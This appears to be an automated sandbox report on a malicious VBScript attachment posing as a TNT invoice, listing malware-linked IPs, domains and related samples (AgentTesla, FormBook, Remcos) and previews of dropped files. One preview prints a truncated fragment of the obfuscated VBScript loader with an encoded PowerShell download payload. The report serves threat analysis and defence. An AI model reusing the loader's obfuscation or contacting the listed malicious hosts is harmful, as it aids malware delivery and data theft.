172.67.215.45	uploaddeimagens.com.br	United States	13335	CLOUDFLARENETUS	true
185.61.152.60	fanconom.shop	United Kingdom	22612	NAMECHEAP-NETUS	false
216.40.34.41	www.rhyme.academy	Canada	15348	TUCOWSCA	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1427200
Start date and time:	2024-04-17 08:38:34 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TNT Invoicing_pdf.vbs
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winVBS@18/8@4/4
EGA Information:	Successful, ratio: 60%
HCA Information:	Successful, ratio: 91% Number of executed functions: 14 Number of non-executed functions: 317
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.114.59.183, 199.232.210.172, 192.229.211.108, 13.85.23.206, 20.166.126.56, 20.3.187.198, 40.68.123.157
Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target SYYSBomrTxWSggG.exe, PID 3432 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2616 because it is empty
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:39:23	API Interceptor	43x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.84.67	Chitanta bancara - #113243.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/u4bvR
	rdevuelto_Pagos.wsf	Get hash	malicious	AgentTesla	Browse	paste.ee/d/SDfNF
	Product list 0980DF098A7.xls	Get hash	malicious	Unknown	Browse	paste.ee/d/enGXm
	Payment_advice.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/wXm0Y
	SHREE GANESH BOOK SERVICES-347274.xls	Get hash	malicious	Unknown	Browse	paste.ee/d/eA3FM
	dereac.vbe	Get hash	malicious	Unknown	Browse	paste.ee/d/JZHbW
	P018400.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/kmRFs
	comprobante0089.xla.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/cJo7v
	RFQ l MR24000112.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/EgkAG
	87645345.vbs	Get hash	malicious	XWorm	Browse	paste.ee/d/IJGyf
172.67.215.45	DHL Shipping Documents_pdf.vbs	Get hash	malicious	AgentTesla	Browse
	P.O.109961.xls	Get hash	malicious	Remcos	Browse
	SecuriteInfo.com.Exploit.ShellCode.69.24616.9282.rtf	Get hash	malicious	Remcos	Browse
	SOA APR24.xls	Get hash	malicious	Remcos	Browse
	2Qvb8zqdPF.rtf	Get hash	malicious	Remcos	Browse
	z15ORDERBR2024-B001054840.vbs	Get hash	malicious	Unknown	Browse
	org.xls	Get hash	malicious	AgentTesla	Browse
	fedex awb &Invoice.vbs	Get hash	malicious	FormBook	Browse
	HSBC Advice_pdf.vbs	Get hash	malicious	FormBook	Browse
	1.vbs	Get hash	malicious	AgentTesla	Browse
185.61.152.60	DHL 986022_pdf.vbs	Get hash	malicious	FormBook	Browse
	TNT Invoice 09004105_pdf.vbs	Get hash	malicious	FormBook	Browse
	DHL 986022_pdf.vbs	Get hash	malicious	Unknown	Browse
216.40.34.41	0ekwLomWKo.exe	Get hash	malicious	FormBook	Browse	www.breadandorchid.com/g0dh/
	bnY2j1hTDlb4vxF.exe	Get hash	malicious	FormBook	Browse	www.velvetgloveseasonings.store/ns03/?PpHd=vEpXOfwZbDF7z7Q3dJL7Pe2+oD++ppewNBRQcYUm39B9ZRdA7FQASoNacaX4ri1FIZun&5jRh=8pz4F2e0
	Invoice.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.culturebuilt.com/u68o/?vTcP727h=gZgUL9+4cZr8Fxd74OjeuZH5IpPLQkjgSgL01OFj5DL8d+rP6ez9BsaSicTvqY2RhsTKIvztUk0IVCDuuaaLWBb1lz5jTXvyWkPNJrTFvJEMaysN9A==&pV=jnzt
	duGqHKp0OUXaX1D.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.velvetgloveseasonings.store/ns03/?9rQhA=J48H&Mli=vEpXOfxtbjALuLNDB5L7Pe2+oD++ppewNBRQcYUm39B9ZRdA7FQASoNacaXdwTFFIZyq
	zmyuUk3Y5G.exe	Get hash	malicious	FormBook	Browse	www.ozuguler.com/cz30/
	PLI2qlm3to.exe	Get hash	malicious	FormBook	Browse	www.ozuguler.com/cz30/
	13xF8yiYm4.exe	Get hash	malicious	FormBook	Browse	www.ozuguler.com/cz30/
	QWde8zzNzJMr5UM.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.ozuguler.com/cz30/
	psv data sheet_jpeg.scr.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.breadandorchid.com/g0dh/
	Repeat_Order_#020823.bat	Get hash	malicious	FormBook, DBatLoader	Browse	www.remedydx.com/fd05/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	https://casestudybuddy.com	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://theredhendc.com	Get hash	malicious	Unknown	Browse	192.229.211.108
	http://bookstopbuzz.com	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://bestohiomortgagerate.com/dream/mer/7/nobody@nobody.org	Get hash	malicious	HTMLPhisher	Browse	192.229.211.108
	https://www.prizeably.es/nam/e5a06f4a-1ec4-4d01-8f73-e7dd15f26134/546610a9-fe5f-4a73-a654-34b70f643dcc/87f066f9-a9e4-4291-ada2-9ebe227c3990/login?id=eCtVUWF0N2xJcytIOUNIeSsxYktIRy9FRTcxd1VvczA4ejVXdkZsOUlNbTB2bVl3V1JmK3NxRm1iZEkzNmFzb1Z0aStWaFNjV1hrUGQrZ29Ua0VWeDlQWUkyRURtS1FLT3dPRWptcGJ6bWVlZVFWVVcwUDkxVlRML3NHWHJkcSt1bUhQdWd0RTV0L0JhSEh3UFFIb1FnU1JhY0lGNzZsVW9DeU1BTmNrRzlheVJ6Y3c4cDhicmVJUmxoZ1ZJek5xemsyY0w2MERPdGIzeXdEaXdDWHU3aTBkdlRGM0d1U1VtZERRTWMyaDdiTFFrWHdySzk2eUVSWkJJUnBDVGZjSy8wYWZPWmw3OUZDYmh6WkRhNkM1QXdZcGZucSszRzl3VWU5Mm1WY3lBeEVlclk1V3pKQ1RHeU9rWHlFWmVZOU1OSGhEaXF1QXpCNGpZaHFpdFAwUmlBSnZXUWpuUGU0TS9wZURmYXloTHMyalpPSHpkZWxibm9jWG8ycHQxSWhjYVlVZzZ4dloxTUxZM2FnTzNCbkVmZz09	Get hash	malicious	Unknown	Browse	192.229.211.108
	http://rakuten.co.jp.rakutle.xyz/	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://appjjjjjj8.z19.web.core.windows.net/Win0security-helpline07/index.html?ph0n=1-844-492-0415	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://pub-fb18fd8aaa2c453dab56d6f0ae35acae.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	192.229.211.108
	https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html	Get hash	malicious	HTMLPhisher	Browse	192.229.211.108
	https://llp61.z1.web.core.windows.net/werrx01USAHTML/?bcda=1-883-293-0114	Get hash	malicious	TechSupportScam	Browse	192.229.211.108
fanconom.shop	DHL 986022_pdf.vbs	Get hash	malicious	FormBook	Browse	185.61.152.60
	TNT Invoice 09004105_pdf.vbs	Get hash	malicious	FormBook	Browse	185.61.152.60
	DHL 986022_pdf.vbs	Get hash	malicious	Unknown	Browse	185.61.152.60
www.rhyme.academy	HSBC Advice_pdf.vbs	Get hash	malicious	FormBook	Browse	216.40.34.41
	DHL 986022_pdf.vbs	Get hash	malicious	FormBook	Browse	216.40.34.41
	TNT Invoice 09004105_pdf.vbs	Get hash	malicious	FormBook	Browse	216.40.34.41
bg.microsoft.map.fastly.net	SWIFT.exe	Get hash	malicious	AgentTesla	Browse	199.232.210.172
	justificante - 2024-04-16T133815.900.exe	Get hash	malicious	AgentTesla	Browse	199.232.214.172
	https://casestudybuddy.com	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://theredhendc.com	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://rakuten.co.jp.rakutle.xyz/	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://appjjjjjj8.z19.web.core.windows.net/Win0security-helpline07/index.html?ph0n=1-844-492-0415	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://rn4l7xnwgswo7wbuyf.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://pub-42f18409450241ad96b799ac0cf167c8.r2.dev/werey.html	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	https://pub-0c3a840de7004b4ba0e6e237abfdaa83.r2.dev/swww.html	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	https://worker-royal-sun-1090.nipocas604.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
paste.ee	L2165c5ZiO.rtf	Get hash	malicious	Remcos	Browse	172.67.187.200
	Qzr31SUgrS.rtf	Get hash	malicious	Remcos	Browse	172.67.187.200
	mrOdyevwvZ.rtf	Get hash	malicious	Unknown	Browse	172.67.187.200
	513616103509452909612589303471676534521900095585.vbs	Get hash	malicious	Unknown	Browse	172.67.187.200
	OFFER DETAIL 75645.xls	Get hash	malicious	Remcos	Browse	172.67.187.200
	DHL Shipping Documents_pdf.vbs	Get hash	malicious	AgentTesla	Browse	104.21.84.67
	P.O.109961.xls	Get hash	malicious	Remcos	Browse	104.21.84.67
	new.xls	Get hash	malicious	Unknown	Browse	172.67.187.200
	SecuriteInfo.com.Exploit.ShellCode.69.24616.9282.rtf	Get hash	malicious	Remcos	Browse	172.67.187.200
	SOA APR24.xls	Get hash	malicious	Remcos	Browse	172.67.187.200
uploaddeimagens.com.br	L2165c5ZiO.rtf	Get hash	malicious	Remcos	Browse	104.21.45.138
	Qzr31SUgrS.rtf	Get hash	malicious	Remcos	Browse	104.21.45.138
	OFFER DETAIL 75645.xls	Get hash	malicious	Remcos	Browse	104.21.45.138
	DHL Shipping Documents_pdf.vbs	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	P.O.109961.xls	Get hash	malicious	Remcos	Browse	172.67.215.45
	new.xls	Get hash	malicious	Unknown	Browse	104.21.45.138
	SecuriteInfo.com.Exploit.ShellCode.69.24616.9282.rtf	Get hash	malicious	Remcos	Browse	172.67.215.45
	SOA APR24.xls	Get hash	malicious	Remcos	Browse	172.67.215.45
	2Qvb8zqdPF.rtf	Get hash	malicious	Remcos	Browse	172.67.215.45
	DHL Receipt_pdf.vbs	Get hash	malicious	AgentTesla	Browse	104.21.45.138

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NAMECHEAP-NETUS	Arrival Notice.vbs	Get hash	malicious	FormBook, GuLoader	Browse	162.255.119.150
	RFQ.exe	Get hash	malicious	FormBook	Browse	37.61.232.138
	rSyDiExlek.exe	Get hash	malicious	Snake Keylogger	Browse	198.54.122.135
	Ordin de plat#U0103.exe	Get hash	malicious	FormBook	Browse	198.54.120.175
	Arrival Notice.vbs	Get hash	malicious	FormBook, GuLoader	Browse	162.255.119.150
	HSBC Advice_pdf.vbs	Get hash	malicious	FormBook	Browse	185.61.152.72
	https://worker-long-darkness-7875.feranthomas135.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	198.187.31.254
	Swift Message.pdf.exe	Get hash	malicious	FormBook	Browse	162.0.236.122
	17129026260efdd91c6d1ffeca6e8eda3ece36cd849272dce1a2d9ab3c208be65a370d4493880.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	198.54.122.135
	17128389081d4616ae42b2693f5ea6783112f41cb2ee5184f49d983f8bf833df0b0e97b429449.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	198.54.122.135
TUCOWSCA	HSBC Advice_pdf.vbs	Get hash	malicious	FormBook	Browse	216.40.34.41
	DHL 986022_pdf.vbs	Get hash	malicious	FormBook	Browse	216.40.34.41
	TNT Invoice 09004105_pdf.vbs	Get hash	malicious	FormBook	Browse	216.40.34.41
	0ekwLomWKo.exe	Get hash	malicious	FormBook	Browse	216.40.34.41
	bnY2j1hTDlb4vxF.exe	Get hash	malicious	FormBook	Browse	216.40.34.41
	Invoice.exe	Get hash	malicious	DBatLoader, FormBook	Browse	216.40.34.41
	duGqHKp0OUXaX1D.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	216.40.34.41
	zmyuUk3Y5G.exe	Get hash	malicious	FormBook	Browse	216.40.34.41
	PLI2qlm3to.exe	Get hash	malicious	FormBook	Browse	216.40.34.41
	13xF8yiYm4.exe	Get hash	malicious	FormBook	Browse	216.40.34.41
CLOUDFLARENETUS	SWIFT.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	tmjGCGOEGMinVPD.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Cleared Payment.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	SAMPLE PURCHASE ORDER.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	http://139.144.214.53/5nXpDw325kdXA19thlgqqvurf31CSRUYYRTWNTDQNU30935IYSS28p9	Get hash	malicious	Phisher	Browse	104.21.54.167
	https://theredhendc.com	Get hash	malicious	Unknown	Browse	104.18.11.207
	Eaton PO-45150292964.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	hcjt7Ajt5t.exe	Get hash	malicious	LummaC	Browse	172.67.217.241
	45brrQrxwH.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Quotation 0048484.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
CLOUDFLARENETUS	SWIFT.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	tmjGCGOEGMinVPD.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Cleared Payment.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	SAMPLE PURCHASE ORDER.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	http://139.144.214.53/5nXpDw325kdXA19thlgqqvurf31CSRUYYRTWNTDQNU30935IYSS28p9	Get hash	malicious	Phisher	Browse	104.21.54.167
	https://theredhendc.com	Get hash	malicious	Unknown	Browse	104.18.11.207
	Eaton PO-45150292964.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	hcjt7Ajt5t.exe	Get hash	malicious	LummaC	Browse	172.67.217.241
	45brrQrxwH.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Quotation 0048484.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	http://139.144.214.53/5nXpDw325kdXA19thlgqqvurf31CSRUYYRTWNTDQNU30935IYSS28p9	Get hash	malicious	Phisher	Browse	173.222.162.64
	https://casestudybuddy.com	Get hash	malicious	Unknown	Browse	173.222.162.64
	https://telegra.ph/Stephen-M-Hickey-04-10	Get hash	malicious	HTMLPhisher	Browse	173.222.162.64
	https://bestohiomortgagerate.com/dream/mer/7/nobody@nobody.org	Get hash	malicious	HTMLPhisher	Browse	173.222.162.64
	https://www.prizeably.es/nam/e5a06f4a-1ec4-4d01-8f73-e7dd15f26134/546610a9-fe5f-4a73-a654-34b70f643dcc/87f066f9-a9e4-4291-ada2-9ebe227c3990/login?id=eCtVUWF0N2xJcytIOUNIeSsxYktIRy9FRTcxd1VvczA4ejVXdkZsOUlNbTB2bVl3V1JmK3NxRm1iZEkzNmFzb1Z0aStWaFNjV1hrUGQrZ29Ua0VWeDlQWUkyRURtS1FLT3dPRWptcGJ6bWVlZVFWVVcwUDkxVlRML3NHWHJkcSt1bUhQdWd0RTV0L0JhSEh3UFFIb1FnU1JhY0lGNzZsVW9DeU1BTmNrRzlheVJ6Y3c4cDhicmVJUmxoZ1ZJek5xemsyY0w2MERPdGIzeXdEaXdDWHU3aTBkdlRGM0d1U1VtZERRTWMyaDdiTFFrWHdySzk2eUVSWkJJUnBDVGZjSy8wYWZPWmw3OUZDYmh6WkRhNkM1QXdZcGZucSszRzl3VWU5Mm1WY3lBeEVlclk1V3pKQ1RHeU9rWHlFWmVZOU1OSGhEaXF1QXpCNGpZaHFpdFAwUmlBSnZXUWpuUGU0TS9wZURmYXloTHMyalpPSHpkZWxibm9jWG8ycHQxSWhjYVlVZzZ4dloxTUxZM2FnTzNCbkVmZz09	Get hash	malicious	Unknown	Browse	173.222.162.64
	http://rakuten.co.jp.rakutle.xyz/	Get hash	malicious	Unknown	Browse	173.222.162.64
	https://pub-fb18fd8aaa2c453dab56d6f0ae35acae.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	173.222.162.64
	https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html	Get hash	malicious	HTMLPhisher	Browse	173.222.162.64
	https://llp61.z1.web.core.windows.net/werrx01USAHTML/?bcda=1-883-293-0114	Get hash	malicious	TechSupportScam	Browse	173.222.162.64
	https://s15dfwgqg6tutek.z13.web.core.windows.net/Win08ShDMeEr0887/index.html?phone=null	Get hash	malicious	TechSupportScam	Browse	173.222.162.64
3b5074b1b5d032e5620f69f9f700ff0e	SWIFT.exe	Get hash	malicious	AgentTesla	Browse	172.67.215.45 185.61.152.60
	tmjGCGOEGMinVPD.exe	Get hash	malicious	AgentTesla	Browse	172.67.215.45 185.61.152.60
	Cleared Payment.exe	Get hash	malicious	AgentTesla	Browse	172.67.215.45 185.61.152.60
	Credit_Details21367163050417024.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.215.45 185.61.152.60
	SAMPLE PURCHASE ORDER.exe	Get hash	malicious	AgentTesla	Browse	172.67.215.45 185.61.152.60
	Eaton PO-45150292964.exe	Get hash	malicious	AgentTesla	Browse	172.67.215.45 185.61.152.60
	45brrQrxwH.exe	Get hash	malicious	AgentTesla	Browse	172.67.215.45 185.61.152.60
	Quotation 0048484.exe	Get hash	malicious	AgentTesla	Browse	172.67.215.45 185.61.152.60
	remittance payment of invoice DMWW24009.exe	Get hash	malicious	AgentTesla	Browse	172.67.215.45 185.61.152.60
	2llKbb9pR7.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoader	Browse	172.67.215.45 185.61.152.60
37f463bf4616ecd445d4a1937da06e19	Credit_Details21367163050417024.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.21.84.67
	2llKbb9pR7.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoader	Browse	104.21.84.67
	MdeeRbWvqe.exe	Get hash	malicious	LummaC, Babuk, Djvu, LummaC Stealer, RedLine, SmokeLoader	Browse	104.21.84.67
	SecuriteInfo.com.Trojan.Inject4.54824.15312.17403.exe	Get hash	malicious	Unknown	Browse	104.21.84.67
	file.exe	Get hash	malicious	Clipboard Hijacker, RisePro Stealer	Browse	104.21.84.67
	E1rGkXuAld.exe	Get hash	malicious	Mars Stealer, Vidar	Browse	104.21.84.67
	zquitaxghu.exe	Get hash	malicious	Mars Stealer, Vidar	Browse	104.21.84.67
	OjYcipehXr.exe	Get hash	malicious	Mars Stealer, Vidar	Browse	104.21.84.67
	DJWTW8Z47D.exe	Get hash	malicious	Mars Stealer, Vidar	Browse	104.21.84.67
	o7P5MzAZm9.exe	Get hash	malicious	Mars Stealer, Vidar	Browse	104.21.84.67

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2569
Entropy (8bit):	4.8218289393855684
Encrypted:	false
SSDEEP:	48:eVrGqSixPKsiUP3XUDtkGPkIHwEVB/0BXssjzmjaR2M/GE6o+pzOO5in1UExudDX:srGq9PgunE3v7VB05ssjzmjaR2M/GE6/
MD5:	E9230BB4637E2E3485EE62464E55C598
SHA1:	F0DF7630DDC9579C24062A2FEE5509DB3FE4B01D
SHA-256:	E5E26ECB9E58B36E1AB2201190ED624CA5617BDD9E5726DE213D98AD4C0AABB2
SHA-512:	D28DAEED7FB47E0473D0D1A9E323AB8D7B9C4CB59654AA84C16A3E174DBB9B22810A122A40A1E70A8647CA1A06CE56A7DAFACA6780C776A0C1B2A22B28641CF5
Malicious:	true
Preview:	@AdvancedKeySettingsNotification.png..@AppHelpToast.png..@AudioToastIcon.png..@BackgroundAccessToastIcon.png..@bitlockertoastimage.png..@edptoastimage.png..@EnrollmentToastIcon.png..@language_notification_icon.png..@optionalfeatures.png..@StorageSenseToastIcon.png..@VpnToastIcon.png..@WindowsHelloFaceToastIcon.png..@WindowsUpdateToastIcon.contrast-black.png..@WindowsUpdateToastIcon.contrast-white.png..@WindowsUpdateToastIcon.png..@WirelessDisplayToast.png..@WLOGO_48x48.png..ActiveHours.png..BluetoothPairingSystemToastIcon.contrast-black.png..BluetoothPairingSystemToastIcon.contrast-high.png..BluetoothPairingSystemToastIcon.contrast-white.png..BluetoothPairingSystemToastIcon.png..BluetoothSystemToastIcon.contrast-white.png..BluetoothSystemToastIcon.png..ComputerToastIcon.contrast-white.png..ComputerToastIcon.png..DefaultAccountTile.png..DisplaySystemToastIcon.contrast-white.png..DisplaySystemToastIcon.png..FeatureToastBulldogImg.png..FeatureToastDlpImg.png..GameSystemToastIcon.contrast-

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\z0DWX[1].txt

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Unicode text, UTF-8 text, with very long lines (11175), with CRLF line terminators
Category:	dropped
Size (bytes):	13321
Entropy (8bit):	4.710516143238715
Encrypted:	false
SSDEEP:	384:7Xy/t/KdVARF5m/d+dm+m5N5YxVzd+mUMIbzHi6uHZz+SI+S8hctd/fYz6sR2ZY6:7XHVqF5I4bm5NsVzgCIbzPBJ+hcAyyKN
MD5:	A4267D8D8F1C81065AB4584670A8EEE5
SHA1:	C0D9B74CA0801A3431DEEE54A5865943F7332BD7
SHA-256:	0B5F3143AD9387FD4C9E9D5A2D005B21DF87FC2011C7E81035219705CC75504D
SHA-512:	55F92892B1EDE5DFF3251862F570F3163C679693CBE0DA1D2D68CDD5CBFE95692DFFB1A68E4583662EB03B033C95CA792273855EBC07D8F7601A2E3D85E33F47
Malicious:	false
Preview:	.. dim entreacto , orvalhinha , golfar , pieguice , hypercinesia , Cama , hypercinesia1.. orvalhinha = " ".. golfar = "" & pieguice & orvalhinha & pieguice & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & pieguice & orvalhinha & pieguice & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & pieguice & orvalhinha & pieguice & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & pieguice & orvalhinha & pieguice & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & pieguice & orvalhinha & pieguice & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & pieguice & orvalhinha & pieguice & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre" & p

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllulp77th:NllU
MD5:	7B5F360646F3167812DC4ADF7B166512
SHA1:	F00A325C611E6C9CC6D2069C0FEAE54C6B7E48E5
SHA-256:	672CD1B39FD62CBC4EEAC339C7863E190A95CEF4DDCEF0F4A5BE946E098B63B0
SHA-512:	7CA2CD8F0A6E6388628AC33A539DB661FCFFE08453DFACFE353B18B548ABC08072BF2FDAE40EEEA671137FE137177ADB4E322D9C77CDE8B6AADE7600EA4C18E0
Malicious:	false
Preview:	@...e.................................x..............@..........

C:\Users\user\AppData\Local\Temp\-2-2FfKI

Download File

Process:	C:\Windows\SysWOW64\SyncHost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1dyiayc1.1li.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2ymxetr.jg1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_th4egcug.bll.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uqlp3gfd.lqx.ps1

Download File

